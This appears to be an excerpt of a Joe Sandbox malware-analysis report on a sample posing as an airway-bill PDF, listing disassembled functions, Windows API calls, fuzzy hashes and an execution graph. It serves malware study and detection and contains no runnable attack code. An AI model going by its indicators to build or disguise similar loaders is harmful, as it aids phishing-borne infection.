                                                                                          • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                          • Instruction Fuzzy Hash: 5F41EA75A0161D9BCB66DB98CC90BD9B7FDBF89314F0041E5E689E7251DA30AF808F60
                                                                                          Function 0293ACC4 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0293ACE1
                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0293AD05
                                                                                          • GetModuleFileNameA.KERNEL32(02930000,?,00000105), ref: 0293AD20
                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0293ADB6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 3990497365-0
                                                                                          • Opcode ID: 4daa1a931c9e5a2218875fa2349a1020de19232524c50298206e913a2e63ff44
                                                                                          • Instruction ID: 493402e8496837278f24e6d544d01d269ab70908049712666811234d34f8a5cc
                                                                                          • Opcode Fuzzy Hash: 4daa1a931c9e5a2218875fa2349a1020de19232524c50298206e913a2e63ff44
                                                                                          • Instruction Fuzzy Hash: 6A415C71A40258ABDB22DB68CC84BDAB7FDAF58301F0044E9A648E7251DB749F84CF50
                                                                                          Function 0293ACC2 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0293ACE1
                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0293AD05
                                                                                          • GetModuleFileNameA.KERNEL32(02930000,?,00000105), ref: 0293AD20
                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0293ADB6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 3990497365-0
                                                                                          • Opcode ID: 23e6d40d0d8d2188b63372266190e9f419618dfd08b653b832de457331a0ec02
                                                                                          • Instruction ID: c6d7d75da1296b675d8a3f265479b8ba5ba6df61a5c39ff57647ebf5f805c854
                                                                                          • Opcode Fuzzy Hash: 23e6d40d0d8d2188b63372266190e9f419618dfd08b653b832de457331a0ec02
                                                                                          • Instruction Fuzzy Hash: D8415F71A40258AFDB22DB68CC84BDAB7FDAF58305F0044E5A648E7251DB749F84CF54
                                                                                          Function 02931C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9cfbed44df94d53d57bf1114fb0de58c70e80ac5c4f79b3ffe94b20f28f13845
                                                                                          • Instruction ID: 3bfe1cb5d3cd8e47b12ccb5b6b1e22568c212c598fd79b5b0f6a3cffe1d6b1a7
                                                                                          • Opcode Fuzzy Hash: 9cfbed44df94d53d57bf1114fb0de58c70e80ac5c4f79b3ffe94b20f28f13845
                                                                                          • Instruction Fuzzy Hash: E8A1F7677106000BE72AAA7C9D843BDB7C6DFC5325F1C827EE11DCB3A1EB68C9528650
                                                                                          Function 02939474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02939562), ref: 029394FA
                                                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02939562), ref: 02939500
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: DateFormatLocaleThread
                                                                                          • String ID: yyyy
                                                                                          • API String ID: 3303714858-3145165042
                                                                                          • Opcode ID: 27e0da38e9caabaf688cb8d897f35fbc51b87cae3cd4a5698a58074b728cfcda
                                                                                          • Instruction ID: 75b0559ae2149018f81656e5eea2b33cc655ecef5cfdadc5bcc9d16f5c631e65
                                                                                          • Opcode Fuzzy Hash: 27e0da38e9caabaf688cb8d897f35fbc51b87cae3cd4a5698a58074b728cfcda
                                                                                          • Instruction Fuzzy Hash: E6213D76A042189FEB12DFA8C881BEEB3B9EF88710F5150A5ED45E7240D7749E40CBA5
                                                                                          Function 0294818C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02948216), ref: 029481F8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                          • String ID: FlushInstructionCache$Kernel32
                                                                                          • API String ID: 3811539418-184458249
                                                                                          • Opcode ID: 458b868d491b636e050754392185f1ae14f76d43abba8b5cce0902e184675471
                                                                                          • Instruction ID: 4bb3bded25b8941d4f028aa150e3286497fc933928df6aaf63ba6e991437408b
                                                                                          • Opcode Fuzzy Hash: 458b868d491b636e050754392185f1ae14f76d43abba8b5cce0902e184675471
                                                                                          • Instruction Fuzzy Hash: 88014B75654304AFEB11EEA8DC42F5A77EDF789B60F624460F904D3680DA74AD108B28
                                                                                          Function 0294AD64 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0294AD98
                                                                                          • IsBadWritePtr.KERNEL32(?,00000004), ref: 0294ADC8
                                                                                          • IsBadReadPtr.KERNEL32(?,00000008), ref: 0294ADE7
                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0294ADF3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Read$Write
                                                                                          • String ID:
                                                                                          • API String ID: 3448952669-0
                                                                                          • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                                          • Instruction ID: 23b6879fae2c8e5937e409b79f9fa3efef3212be0f1c3aeca17ff0e99caa5409
                                                                                          • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                                          • Instruction Fuzzy Hash: 122172B1A80619ABDB11DF69CC90FAE77A9EF84366F004111EE5097344EF34D9119AA4

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.2%
                                                                                          Dynamic/Decrypted Code Coverage:4.4%
                                                                                          Signature Coverage:4.4%
                                                                                          Total number of Nodes:137
                                                                                          Total number of Limit Nodes:11
                                                                                          execution_graph 92264 425143 92269 42515c 92264->92269 92265 4251e9 92266 4251a4 92272 42ebe3 92266->92272 92269->92265 92269->92266 92270 4251e4 92269->92270 92271 42ebe3 RtlFreeHeap 92270->92271 92271->92265 92275 42ce73 92272->92275 92274 4251b4 92276 42ce90 92275->92276 92277 42cea1 RtlFreeHeap 92276->92277 92277->92274 92278 42fce3 92279 42ebe3 RtlFreeHeap 92278->92279 92280 42fcf8 92279->92280 92281 42fc83 92282 42fc93 92281->92282 92283 42fc99 92281->92283 92286 42ecc3 92283->92286 92285 42fcbf 92289 42ce23 92286->92289 92288 42ecde 92288->92285 92290 42ce40 92289->92290 92291 42ce51 RtlAllocateHeap 92290->92291 92291->92288 92292 424da3 92293 424dbf 92292->92293 92294 424de7 92293->92294 92295 424dfb 92293->92295 92296 42cb13 NtClose 92294->92296 92302 42cb13 92295->92302 92298 424df0 92296->92298 92299 424e04 92305 42ed03 RtlAllocateHeap 92299->92305 92301 424e0f 92303 42cb30 92302->92303 92304 42cb41 NtClose 92303->92304 92304->92299 92305->92301 92338 42c0f3 92339 42c110 92338->92339 92342 2a082df0 LdrInitializeThunk 92339->92342 92340 42c138 92342->92340 92306 41a903 92307 41a975 92306->92307 92308 41a91b 92306->92308 92308->92307 92310 41e873 92308->92310 92311 41e899 92310->92311 92315 41e996 92311->92315 92316 42fd23 RtlAllocateHeap RtlFreeHeap 92311->92316 92313 41e934 92313->92315 92317 42c143 92313->92317 92315->92307 92316->92313 92318 42c15d 92317->92318 92321 2a082c0a 92318->92321 92319 42c189 92319->92315 92322 2a082c1f LdrInitializeThunk 92321->92322 92323 2a082c11 92321->92323 92322->92319 92323->92319 92324 414083 92326 4140a9 92324->92326 92325 4140d3 92326->92325 92328 413e03 LdrInitializeThunk 92326->92328 92328->92325 92329 4191a3 92330 4191d3 92329->92330 92332 4191ff 92330->92332 92333 41b673 92330->92333 92334 41b6b7 92333->92334 92335 41b6d8 92334->92335 92336 42cb13 NtClose 92334->92336 92335->92330 92336->92335 92348 414373 92349 41438c 92348->92349 92354 417b33 92349->92354 92351 4143aa 92352 4143f6 92351->92352 92353 4143e3 PostThreadMessageW 92351->92353 92353->92352 92356 417b57 92354->92356 92355 417b5e 92355->92351 92356->92355 92357 417b7d 92356->92357 92361 430063 LdrLoadDll 92356->92361 92359 417b93 LdrLoadDll 92357->92359 92360 417baa 92357->92360 92359->92360 92360->92351 92361->92357 92362 401af2 92363 401b20 92362->92363 92363->92363 92364 401bf3 EntryPoint 92363->92364 92365 401c20 92364->92365 92368 430153 92365->92368 92371 42e793 92368->92371 92372 42e7b9 92371->92372 92383 4075c3 92372->92383 92374 42e7cf 92382 401c2a 92374->92382 92386 41b483 92374->92386 92376 42e7ee 92377 42e803 92376->92377 92401 42cec3 92376->92401 92397 428683 92377->92397 92380 42e81d 92381 42cec3 ExitProcess 92380->92381 92381->92382 92404 4167e3 92383->92404 92385 4075d0 92385->92374 92387 41b4af 92386->92387 92415 41b373 92387->92415 92390 41b4f4 92393 41b510 92390->92393 92395 42cb13 NtClose 92390->92395 92391 41b4dc 92392 41b4e7 92391->92392 92394 42cb13 NtClose 92391->92394 92392->92376 92393->92376 92394->92392 92396 41b506 92395->92396 92396->92376 92399 4286e4 92397->92399 92398 4286f1 92398->92380 92399->92398 92426 4189a3 92399->92426 92402 42cee0 92401->92402 92403 42cef1 ExitProcess 92402->92403 92403->92377 92405 416800 92404->92405 92407 416819 92405->92407 92408 42d573 92405->92408 92407->92385 92410 42d58d 92408->92410 92409 42d5bc 92409->92407 92410->92409 92411 42c143 LdrInitializeThunk 92410->92411 92412 42d61c 92411->92412 92413 42ebe3 RtlFreeHeap 92412->92413 92414 42d635 92413->92414 92414->92407 92416 41b38d 92415->92416 92420 41b469 92415->92420 92421 42c1e3 92416->92421 92419 42cb13 NtClose 92419->92420 92420->92390 92420->92391 92422 42c1fd 92421->92422 92425 2a0835c0 LdrInitializeThunk 92422->92425 92423 41b45d 92423->92419 92425->92423 92427 4189cd 92426->92427 92433 418edb 92427->92433 92434 413fe3 92427->92434 92429 418afa 92430 42ebe3 RtlFreeHeap 92429->92430 92429->92433 92431 418b12 92430->92431 92432 42cec3 ExitProcess 92431->92432 92431->92433 92432->92433 92433->92398 92436 414003 92434->92436 92437 41406c 92436->92437 92439 41b793 RtlFreeHeap LdrInitializeThunk 92436->92439 92437->92429 92438 414062 92438->92429 92439->92438 92337 2a082b60 LdrInitializeThunk

                                                                                          Executed Functions

                                                                                          Function 00401560 Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 561COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000001.1773094379.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_1_400000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$B$a```$gfff$gfff$gfff$gfff
                                                                                          • API String ID: 0-3667867154
                                                                                          • Opcode ID: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                                          • Instruction ID: 4d4c1e64281832a49f187a404ecdf2e47e159528420c40e4fc39f5ea6f09713e
                                                                                          • Opcode Fuzzy Hash: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                                          • Instruction Fuzzy Hash: 3C021771F0011947DB2C9959CC95BFE726AE794304F5881BBEA0AEF3E1E6389F448B44
                                                                                          Function 00417B33 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 120 417b33-417b4f 121 417b57-417b5c 120->121 122 417b52 call 42f7c3 120->122 123 417b62-417b70 call 42fdc3 121->123 124 417b5e-417b61 121->124 122->121 127 417b80-417b91 call 42e263 123->127 128 417b72-417b7d call 430063 123->128 133 417b93-417ba7 LdrLoadDll 127->133 134 417baa-417bad 127->134 128->127 133->134
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                          • Instruction ID: 331d18eb78583633b9e29c6af9a4f26b0dc20ce173b82e1c0a0b08c061dba126
                                                                                          • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                          • Instruction Fuzzy Hash: 780112B5E4410DA7DB10DAA5DC42FDEB3789F54708F0041A6E90897240F635EB588795
                                                                                          Function 0042CB13 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 158 42cb13-42cb4f call 404973 call 42dd63 NtClose
                                                                                          APIs
                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                                          • Instruction ID: 71597bb0a06a303982d629d451bdfe7f1673587ba4a769b47156b06249900e13
                                                                                          • Opcode Fuzzy Hash: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                                          • Instruction Fuzzy Hash: 44E0DF312002003BD220AA2AEC42F9B735CDBC5710F00441AFA09A7141C670790187E4
                                                                                          Function 2A082B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 172 2a082b60-2a082b6c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 26ed15fdf6192a955ea59536ca9524410b12b669a19831d3cc615baaced994d2
                                                                                          • Instruction ID: 4ef24901cbd71409518d2155e00a19a22148368aebe8b83edec2e1e35473789d
                                                                                          • Opcode Fuzzy Hash: 26ed15fdf6192a955ea59536ca9524410b12b669a19831d3cc615baaced994d2
                                                                                          • Instruction Fuzzy Hash: 5F900471303401035105715C4454757440F47F0701F55C031F141C570DC53DCDD5713D
                                                                                          Function 2A082C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 8b033286f847bc970a50d2ea02195f12deadf7589dea891256f6541c85c6c9fa
                                                                                          • Instruction ID: 63ba7aff5745e3dda4931652bf1db689491e53be169459f104ec6c397db945fa
                                                                                          • Opcode Fuzzy Hash: 8b033286f847bc970a50d2ea02195f12deadf7589dea891256f6541c85c6c9fa
                                                                                          • Instruction Fuzzy Hash: 4390023120148902E1107158844478A040547D0701F59C411A4828628D869989957129
                                                                                          Function 2A082DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 620e7f991fbb809056809fdfcc472b84d7ef34258ae77fba0de7226a1bbd37c1
                                                                                          • Instruction ID: 2898a5122ab5f37384106697c28e953514a8bec8d014653589115483073a5f7f
                                                                                          • Opcode Fuzzy Hash: 620e7f991fbb809056809fdfcc472b84d7ef34258ae77fba0de7226a1bbd37c1
                                                                                          • Instruction Fuzzy Hash: 2290023120140513E11171584544747040947D0741F95C412A0828528D965A8A56B129
                                                                                          Function 2A0835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f5227543fc3fac2376d999ad7df27e214a12f9d4c35dc1d4548021620216c1ce
                                                                                          • Instruction ID: 2f834e485ca01ea5ed09b27fdc53a834f5e87e922f095814afba3afbe110bb5a
                                                                                          • Opcode Fuzzy Hash: f5227543fc3fac2376d999ad7df27e214a12f9d4c35dc1d4548021620216c1ce
                                                                                          • Instruction Fuzzy Hash: 4E90023160550502E10071584554746140547D0701F65C411A0828538D87998A5575AA
                                                                                          Function 00414370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(0j0OId92L,00000111,00000000,00000000), ref: 004143F0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: 0j0OId92L$0j0OId92L
                                                                                          • API String ID: 1836367815-695469284
                                                                                          • Opcode ID: bc8f5dee4bc18de4b9c16e2d65e2f97c7383ca15b1cbc30e1dcfe26fbc382a00
                                                                                          • Instruction ID: 395257a172b6fb01821a03ae621abc39386921b5435d80e57e368608866d07a4
                                                                                          • Opcode Fuzzy Hash: bc8f5dee4bc18de4b9c16e2d65e2f97c7383ca15b1cbc30e1dcfe26fbc382a00
                                                                                          • Instruction Fuzzy Hash: 0801C471E41218B6EB21A7D2DD02FDF7B78DF81B14F00806AFA047B180D7B856468BE9
                                                                                          Function 00414373 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 14 414373-414383 15 41438c-4143e1 call 42f693 call 417b33 call 4048e3 call 425283 14->15 16 414387 call 42ec83 14->16 25 414403-414408 15->25 26 4143e3-4143f4 PostThreadMessageW 15->26 16->15 26->25 27 4143f6-414400 26->27 27->25
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(0j0OId92L,00000111,00000000,00000000), ref: 004143F0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: 0j0OId92L$0j0OId92L
                                                                                          • API String ID: 1836367815-695469284
                                                                                          • Opcode ID: 270c509a88a863fe0634043b7060cc8d830b64c78b137e5f7cde7d2a5c309eed
                                                                                          • Instruction ID: ae0f3591e816a9f46982110179c6327102946865d15a57d5eabb58516dd05135
                                                                                          • Opcode Fuzzy Hash: 270c509a88a863fe0634043b7060cc8d830b64c78b137e5f7cde7d2a5c309eed
                                                                                          • Instruction Fuzzy Hash: E601DB71E4021876DB11A6D29C02FDF7B7C9F41B14F04806AFA047B2C1D6B856068BE9
                                                                                          Function 00401AF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
